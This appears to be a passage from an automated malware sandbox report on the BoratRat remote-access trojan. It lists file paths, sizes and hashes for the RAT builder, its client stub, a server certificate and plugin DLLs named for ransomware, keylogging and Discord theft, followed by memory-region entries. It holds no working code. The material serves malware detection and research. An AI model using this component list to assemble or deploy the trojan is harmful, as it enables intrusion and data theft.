                                                                            363e87a13de0b2bf1d5b60d17c6767670ac6431580052070c602b2a850e61efa36dde40700281c2cb6d41ce054aec267007eecab66eb09c8a21bf1440032f806

                                                                          • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SettingsCache.txt

                                                                            Filesize

                                                                            846KB

                                                                            MD5

                                                                            766f5efd9efca73b6dfd0fb3d648639f

                                                                            SHA1

                                                                            71928a29c3affb9715d92542ef4cf3472e7931fe

                                                                            SHA256

                                                                            9111e9a5093f97e15510bf3d3dc36fd4a736981215f79540454ce86893993fdc

                                                                            SHA512

                                                                            1d4bb423d9cc9037f6974a389ff304e5b9fbd4bfd013a09d4ceeff3fd2a87ad81fe84b2ee880023984978391daf11540f353d391f35a4236b241ccced13a3434

                                                                          • C:\Users\Admin\AppData\Local\Server\BoratRat.exe_Url_lrgptkwgygy0ckkeksopg3divcheuvku\1.0.7.0\user.config

                                                                            Filesize

                                                                            309B

                                                                            MD5

                                                                            0c6e4f57ebaba0cc4acfc8bb65c589f8

                                                                            SHA1

                                                                            8c021c2371b87f2570d226b419c64c3102b8d434

                                                                            SHA256

                                                                            a9539ba4eae9035b2ff715f0e755aa772b499d72ccab23af2bf5a2dc2bcfa41c

                                                                            SHA512

                                                                            c6b877ff887d029e29bf35f53006b8c84704f73b74c616bf97696d06c6ef237dff85269bdf8dfb432457b031dd52410e2b883fd86c3f54b09f0a072a689a08c0

                                                                          • C:\Users\Admin\AppData\Local\Server\BoratRat.exe_Url_lrgptkwgygy0ckkeksopg3divcheuvku\1.0.7.0\user.config

                                                                            Filesize

                                                                            580B

                                                                            MD5

                                                                            acb6df8bd0fe9236ea87ea6e3c28173f

                                                                            SHA1

                                                                            8b1d88bd749b58905c6db258e7224a67d1179938

                                                                            SHA256

                                                                            ec2b3fc4d011e9b8a04188d8f2ff280de854dde7d6ebf8e871e0642f789dfa5b

                                                                            SHA512

                                                                            a4222c0f5aeba58679c21361dcb6ab2c7ed1d9cae41d2839089fdb7bbaac3b8735afff8b302557f85389daa977b826cee77b944ba598e3fa6c2a16781453a832

                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qqvskjgl.n0x.ps1

                                                                            Filesize

                                                                            60B

                                                                            MD5

                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                            SHA1

                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                            SHA256

                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                            SHA512

                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                          • C:\Users\Admin\Desktop\Borat\BoratRat.exe

                                                                            Filesize

                                                                            20.0MB

                                                                            MD5

                                                                            65b694d69d327efe28fcbce125401e96

                                                                            SHA1

                                                                            049d4d71742b99a598c074458f1f2d5b0119e912

                                                                            SHA256

                                                                            de60ecbbfef30c93fe8875ef69b358b20076d1f969fc3d21ab44d59dc9ef7cab

                                                                            SHA512

                                                                            7ab57642e414e134e851d9aa2ed3ef8b483f3a5f77877cdc04e08d7f95c44884f8ccc6beaf8ba7f6949cfd7398c46be46c024d4fdeacd3a332d4565609baad5b

                                                                          • C:\Users\Admin\Desktop\Borat\BoratRat.exe.config

                                                                            Filesize

                                                                            5KB

                                                                            MD5

                                                                            3e645ccca1c44a00210924a3b0780955

                                                                            SHA1

                                                                            5d8e8115489ac505c1d10fdd64e494e512dba793

                                                                            SHA256

                                                                            f29e697efd7c5ecb928c0310ea832325bf6518786c8e1585e1b85cdc8701602f

                                                                            SHA512

                                                                            ea7e3a6e476345870f05124a56dde266e1ad04b557b2dde83c5674cfdf3be00f26d3db6a14a8d88ecf75e2c9e3a12e6955f6c85654ba967c17664e9acc3d4f1f

                                                                          • C:\Users\Admin\Desktop\Borat\Client.exe

                                                                            Filesize

                                                                            56KB

                                                                            MD5

                                                                            85177d29b7da7cb2c5d45a63705cbf75

                                                                            SHA1

                                                                            096a6622cab5be82bac79efecafb22618809bc10

                                                                            SHA256

                                                                            6cfc9e4a6192301441cee5a2c6433d61eaf7dab765365364092e0e4830570e7f

                                                                            SHA512

                                                                            5e3c800e3ad305a1cc5771230c822478d81fa94f2354b000bb38e3c3768f50eab0cd217eed1672d6e5c81f399b9713569c18af8541ff9109c7b269a178e2d0f5

                                                                          • C:\Users\Admin\Desktop\Borat\ServerCertificate.p12

                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            478ee44a47895e687296b9ab34df04c4

                                                                            SHA1

                                                                            4b81e94f3d3a99cc01d5c57bd5bec8317f0aca4f

                                                                            SHA256

                                                                            4b0612b2cd5e7ecc456d5c29c89917b8ec881c5f4fd94afe157098ca96308781

                                                                            SHA512

                                                                            28c0635f1e5062fcdef783aceaa8aa53531f18ce66d4aed62a99ec5b31a364e0d0d36fa237d978d75f51a859a7140d31e62aed340eae4aa769e02d1640e30c7b

                                                                          • C:\Users\Admin\Desktop\Borat\bin\Audio.dll

                                                                            Filesize

                                                                            23KB

                                                                            MD5

                                                                            9726d7fe49c8ba43845ad8e5e2802bb8

                                                                            SHA1

                                                                            8bcdf790826a2ac7adfc1e8b214e8de43e086b97

                                                                            SHA256

                                                                            df31a70ceb0c481646eeaf94189242200fafd3df92f8b3ec97c0d0670f0e2259

                                                                            SHA512

                                                                            f97bc1e2ecbbc979d0eea3559c2da0982e4617eb217603224263ef825b8d98b3c52392eeef41888e6295fb60d362f9521e2f2bdaccc762c4591565f9e6248658

                                                                          • C:\Users\Admin\Desktop\Borat\bin\Discord.dll

                                                                            Filesize

                                                                            24KB

                                                                            MD5

                                                                            7ee673594bbb20f65448aab05f1361d0

                                                                            SHA1

                                                                            2a29736882439ef4c9088913e7905c0408cb2443

                                                                            SHA256

                                                                            8fa7634b7dca1a451cf8940429be6ad2440821ed04d5d70b6e727e5968e0b5f6

                                                                            SHA512

                                                                            f5d8457279a5c0684c075eae2d3de62b672303520a1c725b4f97787961e6043c73ca68d4353e5d4168a427104be65b74a9c92a87419348e92d772368e94fab7c

                                                                          • C:\Users\Admin\Desktop\Borat\bin\Extra.dll

                                                                            Filesize

                                                                            31KB

                                                                            MD5

                                                                            62c231bafa469ab04f090fcb4475d360

                                                                            SHA1

                                                                            82dda56bc59ac7db05eddbe4bcf0fe9323e32073

                                                                            SHA256

                                                                            6a4f32b0228092ce68e8448c6f4b74b4c654f40fb2d462c1d6bbd4b4ef09053d

                                                                            SHA512

                                                                            515fbdc9e792bd7ab711261c1d0185351079a2d5b104211c559cfc4c8465794ef897c43f0f825b4fc2e97a56525f73c3ad0a28de0fcf8b8bff89c26d1c97b3cc

                                                                          • C:\Users\Admin\Desktop\Borat\bin\FileManager.dll

                                                                            Filesize

                                                                            32KB

                                                                            MD5

                                                                            4ccd3dfb14ffdddfa598d1096f0190ea

                                                                            SHA1

                                                                            c68c30355599461aca7205a7cbdb3bb1830d59c8

                                                                            SHA256

                                                                            7f8a306826fcb0ee985a2b6d874c805f7f9b2062a1123ea4bb7f1eba90fc1b81

                                                                            SHA512

                                                                            2fa3ea13054d84e1a307ddc63f2a364c760b8e1882fee975585e6e1bae41cad3463495d22d0c8fb77d40e6b0336c3537ab68efb5fd84e46063a336ba20672cbc

                                                                          • C:\Users\Admin\Desktop\Borat\bin\FileSearcher.dll

                                                                            Filesize

                                                                            277KB

                                                                            MD5

                                                                            0b7c33c5739903ba4f4b78c446773528

                                                                            SHA1

                                                                            b58555bebddf8e695880014d34a863a647da547e

                                                                            SHA256

                                                                            2d9625f41793f62bfe32c10b2d5e05668e321bcaf8b73414b3c31ef677b9bff4

                                                                            SHA512

                                                                            d3ea78dcc15e5f365df55558b911f3289f516ecb16c07b7132084ec2e3b10f496d1ef0774416775c14caffbf3107220cfc19ec910cdb2637561b12a23fd1e43f

                                                                          • C:\Users\Admin\Desktop\Borat\bin\Fun.dll

                                                                            Filesize

                                                                            33KB

                                                                            MD5

                                                                            499fc6ac30b3b342833c79523be4a60c

                                                                            SHA1

                                                                            dcf1ed3fbc56d63b42c88ede88f9cad1d509e7ec

                                                                            SHA256

                                                                            dcac599b1bab37e1a388ac469e6cc5de1f35eb02beaa6778f07a1c090ce3ea04

                                                                            SHA512

                                                                            b63dcf0f42a4e80747556000aeee72137735cb7177567df6cfef3f15471efb8c4dc797db8cdc870d66cd87f09ffc7ab177969b126825a69e4b5390b568462484

                                                                          • C:\Users\Admin\Desktop\Borat\bin\Information.dll

                                                                            Filesize

                                                                            24KB

                                                                            MD5

                                                                            87651b12453131dafd3e91f60d8aef5a

                                                                            SHA1

                                                                            d5db880256bffa098718894edf684ea0dc4c335d

                                                                            SHA256

                                                                            a15d72d990686d06d89d7e11df2b16bcd5719a40298c19d046fa22c40d56af44

                                                                            SHA512

                                                                            1b911a877c5a3f508421f4f250d95861a5c110cb4b67ffe05de157085c5a018d34d9574c1ef4cf9eec3ba3cdd39985863564ea2f77814812032ea796cb329afa

                                                                          • C:\Users\Admin\Desktop\Borat\bin\Logger.dll

                                                                            Filesize

                                                                            26KB

                                                                            MD5

                                                                            872145b37d107144894c9aa8729bad42

                                                                            SHA1

                                                                            01610587bcfa7ac379b1f0169a2a9ab384b9116b

                                                                            SHA256

                                                                            2f258949fd95da6cd912beb7203a9fd5e99d050309a40341de67537edb75aadc

                                                                            SHA512

                                                                            0c926d24515b8ea80586c80d2613136f802badde3a788d2960ebd8f6a4d6e901d1ea220262f3d2a852c4f3da88bd69915070de920bc79eb82329c44dcab98435

                                                                          • C:\Users\Admin\Desktop\Borat\bin\MessagePackLib.dll

                                                                            Filesize

                                                                            16KB

                                                                            MD5

                                                                            590b00c87d5ff2ffe09079f0406eb2cd

                                                                            SHA1

                                                                            92c91f1db8c2c8cc34c2e1a26f4f970f1518a7ed

                                                                            SHA256

                                                                            adb00dee751b4ba620d3b0e002f5b6d8b89cf63b062f74ec65bba72294d553d1

                                                                            SHA512

                                                                            9396620bb9d77cacd7bc2bfa44e8fb76091e314298434d8ba995595df0b2a13edf8229c465b563aa668702176ccf2de34e9fd3d1567d4ff20d94672aba4ad745

                                                                          • C:\Users\Admin\Desktop\Borat\bin\Miscellaneous.dll

                                                                            Filesize

                                                                            82KB

                                                                            MD5

                                                                            509d41da4a688a2e50fc8e3afca074c7

                                                                            SHA1

                                                                            228de17938071733585842c59ffb99177831b558

                                                                            SHA256

                                                                            f91973113fd01465999ce317f3e7a89df8c91a5efadcfa61e5ccce687bf3580a

                                                                            SHA512

                                                                            86f975c75e246100d0486aa1507f5c2030323649ae921af51583c6b287e6780e9a9bf887ef4ead11599742cdeb7c90380c7d4859340e11913c2c1f42fb34ef8e

                                                                          • C:\Users\Admin\Desktop\Borat\bin\Netstat.dll

                                                                            Filesize

                                                                            24KB

                                                                            MD5

                                                                            12911f5654d6346fe99ef91e90849c13

                                                                            SHA1

                                                                            1b8e63d03feb84d995c02dcbb74da7edfaa8c763

                                                                            SHA256

                                                                            7eed1b90946a6db1fe978d177a80542b5db0bf3156c979dc8a8869a94811bf4b

                                                                            SHA512

                                                                            588971ef7aebae7afffb22bafdf8f8bb04bf3c474eabf6637543fe42e3e1800cc824929d953055a4f666776ea5fffe0389ef6216c1dca437e0c8a330f6670c19

                                                                          • C:\Users\Admin\Desktop\Borat\bin\Options.dll

                                                                            Filesize

                                                                            378KB

                                                                            MD5

                                                                            3a474b8dee059562b31887197d94f382

                                                                            SHA1

                                                                            b31455f9583b89cac9f655c136801673fb7b4b9a

                                                                            SHA256

                                                                            c9b8e795c5a024f9e3c85ba64534b9bf52cc8c3d29b95ff6417dc3a54bc68b95

                                                                            SHA512

                                                                            cdda908adb88603302b33c99befed0394f12cc34c5a31bc7b4b614df3615ea8a6cad7ef84e7b9865342f33783006974027e39fd458e5936dec14c8ae5e98bf0a

                                                                          • C:\Users\Admin\Desktop\Borat\bin\ProcessManager.dll

                                                                            Filesize

                                                                            25KB

                                                                            MD5

                                                                            91edcb945924df5fbf4ff123aa63199c

                                                                            SHA1

                                                                            d124869aaee9aa1a49def714774b834335aa746e

                                                                            SHA256

                                                                            5b1f80ff787bdcd7ee12aa64be1f2f5f1f658bd644bbc5fd73527b51da6ce0d6

                                                                            SHA512

                                                                            6927c1576a8a9ff724fe3b7d53067f97c121b272c1f2528cb8aa1806de61f36504ee4d25d56eb717a1010a80fb6b5e37c1a0c30b256fdb9a5ba5b31794146c52

                                                                          • C:\Users\Admin\Desktop\Borat\bin\Ransomware.dll

                                                                            Filesize

                                                                            97KB

                                                                            MD5

                                                                            ef998529d037fcdb2bde6d046f99db45

                                                                            SHA1

                                                                            1a38a1182155429ecc64c20ece46ec0836c32ec7

                                                                            SHA256

                                                                            54f554b9e330476b3903756f62b577bab35cdef941d3d0f6a3d607862762bf91

                                                                            SHA512

                                                                            4e4376c182dcdf993c6e8f55388829b9e7057e8d80be268a8469721e8ac7fc29eab65681f0f7f2c0dbad1c5bc30fdcc123774ae543770090bf01a62a0d161ece

                                                                          • C:\Users\Admin\Desktop\DECRYPT.exe

                                                                            Filesize

                                                                            65KB

                                                                            MD5

                                                                            ee71b8c97fe4bdfd9008a38af3ae2e01

                                                                            SHA1

                                                                            ee9861512b832ce5678d29e61a0eeced21aa7fdd

                                                                            SHA256

                                                                            cd9995be15284735b939cc68dc2e5d0caa55da89216cb363cf0c2557a1b208e8

                                                                            SHA512

                                                                            aa0e8520f3120d1390b6559bbeb5cdd376b24003708bc7f60890ccdc01e20c51953475ecbb503729c06ee0e2e2d3cdfca8d209b753312a3daf2a1ffad8bd42db

                                                                          • C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\File Explorer.lnk

                                                                            Filesize

                                                                            416B

                                                                            MD5

                                                                            df284305a0949862486d213d7cb0b105

                                                                            SHA1

                                                                            90b63d12818b5f0ab4c6fa2a358d2f60c715e466

                                                                            SHA256

                                                                            d0d3fc48ac1bfb0763fa78c02a561b72521bb57eeef61e0ac6c44246155c0091

                                                                            SHA512

                                                                            dd0f97c073d8a23c5d1d0068a5e4529e5af89d6f371cb3ab3dd49f0ea7d2d44aff7a2986ab3e7d2984299049f59243a3bbedf8c97c0fcf9578356a879a377e81

                                                                          • \??\pipe\LOCAL\crashpad_3720_VYSNEEOFGGNYZRVX

                                                                            MD5

                                                                            d41d8cd98f00b204e9800998ecf8427e

                                                                            SHA1

                                                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                            SHA256

                                                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                            SHA512

                                                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                          • memory/1220-105-0x00000000015F0000-0x00000000015FE000-memory.dmp

                                                                            Filesize

                                                                            56KB

                                                                          • memory/1220-143-0x000000001D860000-0x000000001D87E000-memory.dmp

                                                                            Filesize

                                                                            120KB

                                                                          • memory/1220-106-0x0000000002F20000-0x0000000002F3E000-memory.dmp

                                                                            Filesize

                                                                            120KB

                                                                          • memory/1220-104-0x000000001B970000-0x000000001B9E6000-memory.dmp

                                                                            Filesize

                                                                            472KB

                                                                          • memory/1220-96-0x0000000000D30000-0x0000000000D44000-memory.dmp

                                                                            Filesize

                                                                            80KB

                                                                          • memory/1864-14856-0x00000000008C0000-0x00000000008D6000-memory.dmp

                                                                            Filesize

                                                                            88KB

                                                                          • memory/2128-3463-0x0000026377380000-0x0000026377381000-memory.dmp

                                                                            Filesize

                                                                            4KB

                                                                          • memory/2128-3470-0x0000026377380000-0x0000026377381000-memory.dmp

                                                                            Filesize

                                                                            4KB

                                                                          • memory/2128-3462-0x0000026377380000-0x0000026377381000-memory.dmp

                                                                            Filesize

                                                                            4KB

                                                                          • memory/2128-3464-0x0000026377380000-0x0000026377381000-memory.dmp

                                                                            Filesize

                                                                            4KB

                                                                          • memory/2128-3471-0x0000026377380000-0x0000026377381000-memory.dmp

                                                                            Filesize

                                                                            4KB

                                                                          • memory/2128-3473-0x0000026377380000-0x0000026377381000-memory.dmp

                                                                            Filesize

                                                                            4KB

                                                                          • memory/2128-3469-0x0000026377380000-0x0000026377381000-memory.dmp

                                                                            Filesize

                                                                            4KB

                                                                          • memory/2128-3468-0x0000026377380000-0x0000026377381000-memory.dmp

                                                                            Filesize

                                                                            4KB

                                                                          • memory/2128-3474-0x0000026377380000-0x0000026377381000-memory.dmp

                                                                            Filesize

                                                                            4KB

                                                                          • memory/2128-3472-0x0000026377380000-0x0000026377381000-memory.dmp

                                                                            Filesize

                                                                            4KB

                                                                          • memory/3008-67-0x000001F3A35B0000-0x000001F3A3656000-memory.dmp

                                                                            Filesize

                                                                            664KB

                                                                          • memory/3008-59-0x000001F3848E0000-0x000001F385CEA000-memory.dmp

                                                                            Filesize

                                                                            20.0MB

                                                                          • memory/3592-4135-0x0000000003110000-0x000000000312C000-memory.dmp

                                                                            Filesize

                                                                            112KB

                                                                          • memory/3592-4133-0x000000001BC60000-0x000000001BCC6000-memory.dmp

                                                                            Filesize

                                                                            408KB

                                                                          • memory/4804-112-0x000001A0C8C10000-0x000001A0C8C32000-memory.dmp

                                                                            Filesize

                                                                            136KB